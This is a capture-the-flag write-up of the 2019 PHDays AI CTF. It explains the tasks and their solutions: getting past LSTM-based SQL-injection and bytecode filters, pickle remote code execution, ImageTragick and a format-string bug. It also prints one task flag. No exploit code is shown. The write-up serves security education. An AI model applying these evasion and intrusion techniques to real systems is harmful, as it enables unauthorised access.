AI CTF: writeup and solutions

6/21/2019

At PHDays 9 we decided to take a look at the grittier side of artificial intelligence and machine learning. Our task-based capture the flag contest, AI CTF, put participants through their paces to test knowledge of AI-related security topics.

Classic CTFs somewhat resemble a game of Jeopardy: tasks are organized by category, with each task worth a bit more than the one preceding it. The topics were standard for security CTFs, including web vulnerabilities, reverse engineering, cryptography, steganography, and binary exploitation. The winner is the team (which can be as small as one person) that collects the most points.

AI CTF launched on the first day of PHDays and lasted just over 24 hours. The battle was every hacker for himself or herself. Although the contest was held online, some of the participants were on-site at PHDays, so everyone could get to know each other. The tasks did not require great computing resources and, in theory, could be finished in just a few hours. But make no mistake, some of the tasks were challenging—we didn't want to make it too easy J

The contest consisted of six tasks (the seventh was just for the lulz). In this article, we will go over the solutions and note where many contenders got stuck.

But first, a massive thank you to @groke and @mostobriv, whose awesome ideas and technical insights made this CTF possible. What could have been nicer than a contest-eve deploy party in such splendid company?

Aww

Participants were given a dataset of 3,391 cat and dog photos: tiny.cc/6fj06y.

Since this task was in the steganography category, information of some sort had been hidden. Take a look at the images—it's an easy intuitive leap to guess that cats and dogs are acting as binary data. In other words, the sequence of cats and dogs just might form a message. Say that cats are 1 and dogs are 0 (or vice versa, just swap the two). Then participants needed to find a trained model to classify all these feline and canine faces. Worst case, you could train a model yourself. There are plenty of lessons on cat/dog classification, as well as trained models, on GitHub. Then, after reducing each image to a 0 or a 1, they needed to turn that sequence of bytes into a string.

The task author has a solution published on GitHub.

The resulting text contains the task flag:

AICTF{533m5_y0u_und3r574nd_4n1m4l5}

Multiple participants tried to tell us they had found a flag with the word "adopted," which we had a hard time understanding. It turned out that one of the pictures in the dataset had that word written on it prominently. And despite the point of steganography being to hide things, they assumed that this was the answer.

Notes

A web vulnerability task. The target in question was a blog where any user could make public and private notes. Given the limited feature set, it was easy to surmise that the task was to obtain a private note.

There was effectively just one input field (the entry ID). So what was a contestant to do?

The first thing to come to mind might be SQL injection. But since the blog is protected with AI (as noted in the task description), garden-variety SQL injection wouldn't work. Such attempts triggered the message "Hacking attempt!"—which many tried to send in as the task flag. Getting the actual solution required a bit more cleverness.

Under the hood was an LSTM network, which analyzed the ID parameter for SQL injection. But the input for LSTM should have a fixed length, which for simplicity's sake we limited to 20 characters. So take the query and, if it's more than 20 characters, truncate it and verify the remainder. If it's less than 20 characters, pad it with zeroes. So ordinary SQL injection would not work right away. But there was a chance to find a vector that would slip by as a "good" query, unnoticed by the neural network.

New Edge QR reader

The task required recognizing a QR code:

Encrypted task files are available for download on Google Drive. Reversing the .pyc file and looking at the function code would show that all the necessary files were encrypted with AES using a key obtained from the bytecode of this function and another one inside it.

There were two solution paths. The first: parse the .pyc file and get the implementation of the function. The other way was to make your own hashlib proxy module, which would output its own argument that, when run, would yield the decryption key. All that would remain is to run the QR reader to recognize the included picture as a flag.

Here is the detailed solution proposed by one of the top participants.

Prediction challenge

This was something like a Kaggle contest: sign up, download data and models, test these with private data, and get your result put up on the scoreboard. The objective was obvious: to obtain a perfect 1.0 score.

In our case, doing so was very difficult—and actually impossible!

The data had been generated randomly and, of course, taking the time to train the model was not what we had in mind. There had to be another way to get the necessary prediction ability. The site allowed uploading models in pickle format. Pickle, as everyone knows, can even be used for RCE—and what could be worse than that?

Not everyone knew, as it turned out. But this fact is what our brave participants needed to take advantage of. With remote access to the server, they could download the data used to test the solution, retrain the model, get that otherwise unattainable 1.0 score, and grab the flag.

Our third-place winner published a solution on GitHub.

PhotoGram

Unsurprisingly, the mock service does something with images. Participants were invited to upload a photo:

In response, they would receive a stylized image with the AI CTF logo:

So where's the flag? What would a CTF be without plain old vulnerabilities, we say. This time, the vulnerability in question involved ImageTragick. Only a few of the contestants made that connection, and not all who figured that out were able to exploit it.

New Age antivirus

This task was not solved by anyone, although based on our conversations with some of the competitors, they were very close to the answer.

The task files are available for download on Google Drive.

The system took Python bytecode and ran it on the server side. Of course, things aren't quite that simple, since there is AI security involved. The AI verified the Python version and if the code passed the check, it was run on the server. And this could yield a lot of information.

You could sprinkle NOPs in the bytecode given by the interpreter and the neural network (also an LSTM) would have let them through.

Subsequently, if you're able to run Python code, you could discover the flag_reader binary flag (run by root) on the server. The file contained a formatting string vulnerability that enabled reading the flag.

The approach of one participant can be read on GitHub.

Results

A total of 130 contestants signed up for the contest, of which 14 found at least one flag. Five of the six tasks were solved.

Top scorers:

  • 1st place – silent (500 points)
  • 2nd place – kurmur (500 points)
  • 3rd place – konodyuk (400 points)

At the end of Day 2 of PHDays, the winners received congratulations and neat prizes: AWS DeepLens, Coral Dev Board, and a PHDays backpack.

The usual CTF crowd, which in recent years has been getting into machine learning and AI, appreciated the contest. We hope next time that the contestants will include security-curious data analysts too!